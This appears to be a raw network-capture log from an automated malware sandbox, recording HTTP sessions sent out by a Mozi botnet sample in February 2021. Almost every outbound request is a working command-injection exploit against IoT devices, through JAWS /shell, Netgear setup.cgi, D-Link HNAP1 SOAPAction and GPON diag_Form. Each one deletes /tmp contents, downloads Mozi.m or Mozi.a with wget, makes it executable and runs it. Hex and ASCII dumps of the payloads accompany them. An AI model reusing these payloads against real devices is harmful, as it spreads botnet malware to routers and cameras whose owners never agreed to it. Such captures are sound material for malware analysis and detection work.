                                                                                                                  Feb 6, 2021 11:37:44.021265030 CET835OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.12.191.118:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:37:44.289354086 CET836INHTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 209
                                                                                                                  Expires: Sat, 06 Feb 2021 10:37:44 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:44 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 36 63 39 37 62 63 38 26 23 34 36 3b 31 36 31 32 36 30 37 38 36 34 26 23 34 36 3b 32 63 34 61 65 39 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d6c97bc8&#46;1612607864&#46;2c4ae993</BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  22192.168.2.205983223.53.160.3680
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:51.033628941 CET870OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:37:51.310208082 CET870INHTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 208
                                                                                                                  Expires: Sat, 06 Feb 2021 10:37:51 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:51 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 62 30 30 33 64 31 37 26 23 34 36 3b 31 36 31 32 36 30 37 38 37 31 26 23 34 36 3b 65 63 36 31 62 63 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;bb003d17&#46;1612607871&#46;ec61bc6</BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  23192.168.2.20397482.22.143.22280
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:38:28.846885920 CET1053OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:38:28.901905060 CET1053INHTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 209
                                                                                                                  Expires: Sat, 06 Feb 2021 10:38:28 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:38:28 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 63 64 32 31 31 30 32 26 23 34 36 3b 31 36 31 32 36 30 37 39 30 38 26 23 34 36 3b 31 30 39 37 64 62 62 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3cd21102&#46;1612607908&#46;1097dbb2</BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  24192.168.2.2033236180.254.107.5580
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:38:32.964672089 CET1069OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 180.254.107.55:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  25192.168.2.205572234.66.226.19080
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:38:38.902142048 CET1096OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 34.66.226.190:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:38:49.783454895 CET1150INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Sat, 06 Feb 2021 10:38:38 GMT
                                                                                                                  Server: Apache/2.4.25 (Debian)
                                                                                                                  Content-Length: 305
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 33 34 2e 36 36 2e 32 32 36 2e 31 39 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at 34.66.226.190 Port 80</address></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  26192.168.2.2049434104.149.254.17780
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:38:49.967998028 CET1151OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:38:50.163552046 CET1151INHTTP/1.1 200 OK
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:02 GMT
                                                                                                                  Content-Length: 205
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e 4f ea f4 ee 51 f2 78 72 f4 2c 6b b3 32 cd eb ba aa 1f df 9d 1c 3d 4a d3 37 f3 a2 49 cf 8b 32 4f e7 59 93 e6 ef 56 45 9d cf c6 69 b1 4c a9 f9 d3 47 bf ef ec fe c1 55 3e f9 7d b3 d5 ea f7 2d 96 d3 06 ff 8c 57 f3 15 de 4e ab 65 5a 16 cb 1c 2d 77 f0 81 f6 f3 ff 00 a6 dc 9b 26 6f 00 00 00
                                                                                                                  Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"OQxr,k2=J7I2OYVEiLGU>}-WNeZ-w&o
                                                                                                                  Feb 6, 2021 11:38:50.163602114 CET1152INHTTP/1.1 400 Bad Request
                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:02 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 326
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 56 65 72 62 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 76 65 72 62 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  27192.168.2.2053268104.103.19.23280
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:39:00.933777094 CET1200OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:39:01.090933084 CET1201INHTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 208
                                                                                                                  Expires: Sat, 06 Feb 2021 10:39:01 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:01 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 30 61 34 33 36 31 37 26 23 34 36 3b 31 36 31 32 36 30 37 39 34 31 26 23 34 36 3b 61 37 38 34 30 62 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;50a43617&#46;1612607941&#46;a7840bb</BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  28192.168.2.204507277.238.74.16380
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:39:10.830598116 CET2065OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:39:10.906177998 CET2066INHTTP/1.1 405 Not Allowed
                                                                                                                  Server: nginx/1.16.1
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:10 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 157
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  29192.168.2.2037542176.119.128.10680
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:39:10.923391104 CET2066OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:39:11.084525108 CET2067INHTTP/1.1 302 Found
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:10 GMT
                                                                                                                  Server: Apache/2.2.15 (CentOS)
                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                  location: http://shareyourcharities.com/red.php/diag_Form
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  3192.168.2.203508823.254.64.8880
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:35:58.898740053 CET319OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 23.254.64.88:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:35:59.032236099 CET320INHTTP/1.1 500 Internal Server Error
                                                                                                                  Server: Tengine/2.0.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:58 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 677
                                                                                                                  Connection: close
